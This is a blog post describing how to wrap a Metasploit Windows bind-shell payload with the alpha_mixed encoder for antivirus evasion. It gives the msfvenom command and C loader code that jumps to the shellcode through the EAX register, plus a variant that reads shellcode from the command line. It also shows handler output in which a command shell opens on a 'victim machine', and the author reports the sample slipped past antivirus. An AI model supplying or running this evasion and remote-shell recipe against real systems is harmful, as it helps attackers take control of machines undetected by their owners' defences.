Using msf alpha_mixed encoder for antivirus evasion

For enhancing AVET I had a look at the alpha_mixed encoder from the metasploit project. An ASCII only shellcode can be produced that way:

# msfvenom -a x86 --platform windows -p windows/shell/bind_tcp -e x86/alpha_mixed BufferRegister=EAX -f c

With the common technique of a shellcode binder (or function pointer) the shellcode can not be executed, because it is expected that the address of the shellcode can be found in the EAX register. For more information about that refer “Generating Alphanumeric Shellcode with Metasploit“.

The shellcode can be executed this way:

unsigned char buf[] = 
...

int main(int argc, char **argv)
{
	register unsigned char* r asm("eax");
	r=buf;
	asm("call *%eax;");
}

The full example can be found here.

After starting the executable on the victim machine for the handler do:

msf exploit(handler) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(handler) > set rhost 192.168.2.103
rhost => 192.168.2.103
msf exploit(handler) > run

[*] Started bind handler
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.103
[*] Command shell session 1 opened (192.168.2.104:36907 -> 192.168.2.103:4444) at 2017-06-15 07:50:17 -0400

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Alle Rechte vorbehalten.

C:\Users\dax\Downloads>

To my surprise the sample shown already worked for antivirus evasion. Of course this will be part of the new version of AVET that will be released end of July ’17.

 

UPDATE 02.08.2017: Call ASCII Shellcode as Parameter from CMD

You can also give the shellcode as a parameter from commandline:

Code:

int main(int argc, char **argv)
{
	register unsigned char* r asm("eax");
	r=argv[1];
	asm("call *%eax;");
}

Here is the full example.

 

More:
https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/
https://gcc.gnu.org/onlinedocs/gcc/Local-Register-Variables.html
https://stackoverflow.com/questions/2114163/reading-a-register-value-into-a-c-variable

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s